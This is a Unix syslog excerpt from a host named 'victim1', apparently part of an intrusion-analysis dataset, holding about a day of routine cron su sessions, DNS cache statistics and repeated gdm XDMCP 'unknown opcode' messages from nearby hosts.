Jan 10 07:01:00 victim1 PAM_pwdb[14679]: (su) session opened for user news by (uid=0)
Jan 10 07:01:02 victim1 PAM_pwdb[14679]: (su) session closed for user news
Jan 10 07:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 07:21:58 victim1 named[385]: USAGE 947460118 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 07:21:58 victim1 named[385]: NSTATS 947460118 944119308
Jan 10 07:21:58 victim1 named[385]: XSTATS 947460118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 07:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 07:39:41 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 08:01:00 victim1 PAM_pwdb[14738]: (su) session opened for user news by (uid=0)
Jan 10 08:01:01 victim1 PAM_pwdb[14738]: (su) session closed for user news
Jan 10 08:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 08:21:58 victim1 named[385]: USAGE 947463718 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 08:21:58 victim1 named[385]: NSTATS 947463718 944119308
Jan 10 08:21:58 victim1 named[385]: XSTATS 947463718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 08:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 08:39:41 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 09:01:00 victim1 PAM_pwdb[14797]: (su) session opened for user news by (uid=0)
Jan 10 09:01:03 victim1 PAM_pwdb[14797]: (su) session closed for user news
Jan 10 09:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 09:21:58 victim1 named[385]: USAGE 947467318 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 09:21:58 victim1 named[385]: NSTATS 947467318 944119308
Jan 10 09:21:58 victim1 named[385]: XSTATS 947467318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 09:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 09:39:41 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 10:01:00 victim1 PAM_pwdb[14856]: (su) session opened for user news by (uid=0)
Jan 10 10:01:01 victim1 PAM_pwdb[14856]: (su) session closed for user news
Jan 10 10:19:52 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 10:19:52 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 10:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 10:21:58 victim1 named[385]: USAGE 947470918 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 10:21:58 victim1 named[385]: NSTATS 947470918 944119308
Jan 10 10:21:58 victim1 named[385]: XSTATS 947470918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 10:22:03 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 10:22:03 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 10:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 10:39:40 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 11:01:01 victim1 PAM_pwdb[14917]: (su) session opened for user news by (uid=0)
Jan 10 11:01:03 victim1 PAM_pwdb[14917]: (su) session closed for user news
Jan 10 11:02:53 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 11:19:49 victim1 last message repeated 2 times
Jan 10 11:19:49 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 11:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 11:21:58 victim1 named[385]: USAGE 947474518 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 11:21:58 victim1 named[385]: NSTATS 947474518 944119308
Jan 10 11:21:58 victim1 named[385]: XSTATS 947474518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 11:28:11 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 11:28:11 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 11:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 11:39:41 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 12:01:01 victim1 PAM_pwdb[14979]: (su) session opened for user news by (uid=0)
Jan 10 12:01:02 victim1 PAM_pwdb[14979]: (su) session closed for user news
Jan 10 12:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 12:21:58 victim1 named[385]: USAGE 947478118 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 12:21:58 victim1 named[385]: NSTATS 947478118 944119308
Jan 10 12:21:58 victim1 named[385]: XSTATS 947478118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 12:28:14 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 12:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 12:39:41 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 13:01:01 victim1 PAM_pwdb[15038]: (su) session opened for user news by (uid=0)
Jan 10 13:01:02 victim1 PAM_pwdb[15038]: (su) session closed for user news
Jan 10 13:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 13:21:58 victim1 named[385]: USAGE 947481718 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 13:21:58 victim1 named[385]: NSTATS 947481718 944119308
Jan 10 13:21:58 victim1 named[385]: XSTATS 947481718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 13:28:14 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 13:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 13:39:41 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 13:53:28 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 13:54:10 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 13:59:16 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 14:01:01 victim1 PAM_pwdb[15097]: (su) session opened for user news by (uid=0)
Jan 10 14:01:02 victim1 PAM_pwdb[15097]: (su) session closed for user news
Jan 10 14:03:55 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 14:03:55 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 14:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 14:21:58 victim1 named[385]: USAGE 947485318 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 14:21:58 victim1 named[385]: NSTATS 947485318 944119308
Jan 10 14:21:58 victim1 named[385]: XSTATS 947485318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 14:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 14:47:59 victim1 PAM_pwdb[15147]: (login) session opened for user skcheung by (uid=0)
Jan 10 15:01:00 victim1 PAM_pwdb[15182]: (su) session opened for user news by (uid=0)
Jan 10 15:01:02 victim1 PAM_pwdb[15182]: (su) session closed for user news
Jan 10 15:03:56 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 15:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 15:21:58 victim1 named[385]: USAGE 947488918 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 15:21:58 victim1 named[385]: NSTATS 947488918 944119308
Jan 10 15:21:58 victim1 named[385]: XSTATS 947488918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 15:26:20 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 15:30:57 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 15:32:47 victim1 last message repeated 2 times
Jan 10 15:33:28 victim1 last message repeated 5 times
Jan 10 15:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 15:54:46 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 15:54:51 victim1 last message repeated 3 times
Jan 10 15:57:38 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 10 15:57:38 victim1 last message repeated 2 times
Jan 10 16:01:00 victim1 PAM_pwdb[15241]: (su) session opened for user news by (uid=0)
Jan 10 16:01:01 victim1 PAM_pwdb[15241]: (su) session closed for user news
Jan 10 16:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 16:21:58 victim1 named[385]: USAGE 947492518 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 16:21:58 victim1 named[385]: NSTATS 947492518 944119308
Jan 10 16:21:58 victim1 named[385]: XSTATS 947492518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 16:26:20 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 16:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 16:45:35 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 10 16:45:35 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 10 16:50:50 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 16:50:50 victim1 last message repeated 2 times
Jan 10 17:01:00 victim1 PAM_pwdb[15300]: (su) session opened for user news by (uid=0)
Jan 10 17:01:01 victim1 PAM_pwdb[15300]: (su) session closed for user news
Jan 10 17:06:45 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.98.33
Jan 10 17:06:45 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.98.33
Jan 10 17:08:53 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 17:08:53 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 10 17:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 17:21:58 victim1 named[385]: USAGE 947496118 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 17:21:58 victim1 named[385]: NSTATS 947496118 944119308
Jan 10 17:21:58 victim1 named[385]: XSTATS 947496118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 17:26:20 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 17:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 18:01:00 victim1 PAM_pwdb[15361]: (su) session opened for user news by (uid=0)
Jan 10 18:01:03 victim1 PAM_pwdb[15361]: (su) session closed for user news
Jan 10 18:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 18:21:58 victim1 named[385]: USAGE 947499718 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 18:21:58 victim1 named[385]: NSTATS 947499718 944119308
Jan 10 18:21:58 victim1 named[385]: XSTATS 947499718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 18:27:56 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 18:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 18:46:58 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 10 18:46:58 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 10 19:01:00 victim1 PAM_pwdb[15422]: (su) session opened for user news by (uid=0)
Jan 10 19:01:02 victim1 PAM_pwdb[15422]: (su) session closed for user news
Jan 10 19:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 19:21:58 victim1 named[385]: USAGE 947503318 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 19:21:58 victim1 named[385]: NSTATS 947503318 944119308
Jan 10 19:21:58 victim1 named[385]: XSTATS 947503318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 19:27:55 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 19:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 20:01:00 victim1 PAM_pwdb[15483]: (su) session opened for user news by (uid=0)
Jan 10 20:01:02 victim1 PAM_pwdb[15483]: (su) session closed for user news
Jan 10 20:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 20:21:58 victim1 named[385]: USAGE 947506918 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 20:21:58 victim1 named[385]: NSTATS 947506918 944119308
Jan 10 20:21:58 victim1 named[385]: XSTATS 947506918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 20:28:40 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 20:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 21:01:01 victim1 PAM_pwdb[15544]: (su) session opened for user news by (uid=0)
Jan 10 21:01:02 victim1 PAM_pwdb[15544]: (su) session closed for user news
Jan 10 21:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 21:21:58 victim1 named[385]: USAGE 947510518 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 21:21:58 victim1 named[385]: NSTATS 947510518 944119308
Jan 10 21:21:58 victim1 named[385]: XSTATS 947510518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 21:28:40 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 21:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 22:01:01 victim1 PAM_pwdb[15605]: (su) session opened for user news by (uid=0)
Jan 10 22:01:02 victim1 PAM_pwdb[15605]: (su) session closed for user news
Jan 10 22:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 22:21:58 victim1 named[385]: USAGE 947514118 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 22:21:58 victim1 named[385]: NSTATS 947514118 944119308
Jan 10 22:21:58 victim1 named[385]: XSTATS 947514118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 22:28:39 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 22:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 23:01:01 victim1 PAM_pwdb[15666]: (su) session opened for user news by (uid=0)
Jan 10 23:01:03 victim1 PAM_pwdb[15666]: (su) session closed for user news
Jan 10 23:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 23:21:58 victim1 named[385]: USAGE 947517718 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 23:21:58 victim1 named[385]: NSTATS 947517718 944119308
Jan 10 23:21:58 victim1 named[385]: XSTATS 947517718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 23:28:39 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 23:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 00:01:01 victim1 PAM_pwdb[15727]: (su) session opened for user news by (uid=0)
Jan 11 00:01:02 victim1 PAM_pwdb[15727]: (su) session closed for user news
Jan 11 00:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 00:21:58 victim1 named[385]: USAGE 947521318 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 11 00:21:58 victim1 named[385]: NSTATS 947521318 944119308
Jan 11 00:21:58 victim1 named[385]: XSTATS 947521318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 00:28:39 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 00:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 01:01:00 victim1 PAM_pwdb[15788]: (su) session opened for user news by (uid=0)
Jan 11 01:01:01 victim1 PAM_pwdb[15788]: (su) session closed for user news
Jan 11 01:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 01:21:58 victim1 named[385]: USAGE 947524918 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 11 01:21:58 victim1 named[385]: NSTATS 947524918 944119308
Jan 11 01:21:58 victim1 named[385]: XSTATS 947524918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 01:28:39 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 01:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 02:01:00 victim1 PAM_pwdb[15849]: (su) session opened for user news by (uid=0)
Jan 11 02:01:01 victim1 PAM_pwdb[15849]: (su) session closed for user news
Jan 11 02:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 02:21:58 victim1 named[385]: USAGE 947528518 944119308 CPU=0.88u/2.9s CHILDCPU=0u/0s
Jan 11 02:21:58 victim1 named[385]: NSTATS 947528518 944119308
Jan 11 02:21:58 victim1 named[385]: XSTATS 947528518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 02:28:39 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 02:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 03:01:01 victim1 PAM_pwdb[15910]: (su) session opened for user news by (uid=0)
Jan 11 03:01:02 victim1 PAM_pwdb[15910]: (su) session closed for user news
Jan 11 03:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 03:21:58 victim1 named[385]: USAGE 947532118 944119308 CPU=0.89u/2.92s CHILDCPU=0u/0s
Jan 11 03:21:58 victim1 named[385]: NSTATS 947532118 944119308
Jan 11 03:21:58 victim1 named[385]: XSTATS 947532118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 03:28:38 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 03:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 04:01:00 victim1 PAM_pwdb[15971]: (su) session opened for user news by (uid=0)
Jan 11 04:01:03 victim1 PAM_pwdb[15971]: (su) session closed for user news
Jan 11 04:02:01 victim1 PAM_pwdb[16012]: (su) session opened for user news by (uid=0)
Jan 11 04:02:52 victim1 PAM_pwdb[16012]: (su) session closed for user news
Jan 11 04:06:16 victim1 PAM_pwdb[16485]: (su) session opened for user news by (uid=0)
Jan 11 04:06:17 victim1 PAM_pwdb[16485]: (su) session closed for user news
Jan 11 04:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 04:21:58 victim1 named[385]: USAGE 947535718 944119308 CPU=0.89u/2.92s CHILDCPU=0u/0s
Jan 11 04:21:58 victim1 named[385]: NSTATS 947535718 944119308
Jan 11 04:21:58 victim1 named[385]: XSTATS 947535718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 04:28:38 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 04:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 05:01:01 victim1 PAM_pwdb[16590]: (su) session opened for user news by (uid=0)
Jan 11 05:01:03 victim1 PAM_pwdb[16590]: (su) session closed for user news
Jan 11 05:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 05:21:58 victim1 named[385]: USAGE 947539318 944119308 CPU=0.89u/2.92s CHILDCPU=0u/0s
Jan 11 05:21:58 victim1 named[385]: NSTATS 947539318 944119308
Jan 11 05:21:58 victim1 named[385]: XSTATS 947539318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 05:28:38 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 05:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 06:01:01 victim1 PAM_pwdb[16651]: (su) session opened for user news by (uid=0)
Jan 11 06:01:03 victim1 PAM_pwdb[16651]: (su) session closed for user news
Jan 11 06:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 11 06:21:58 victim1 named[385]: USAGE 947542918 944119308 CPU=0.89u/2.92s CHILDCPU=0u/0s
Jan 11 06:21:58 victim1 named[385]: NSTATS 947542918 944119308
Jan 11 06:21:58 victim1 named[385]: XSTATS 947542918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 11 06:28:38 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 11 06:37:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 11 07:01:00 victim1 PAM_pwdb[16712]: (su) session opened for user news by (uid=0)
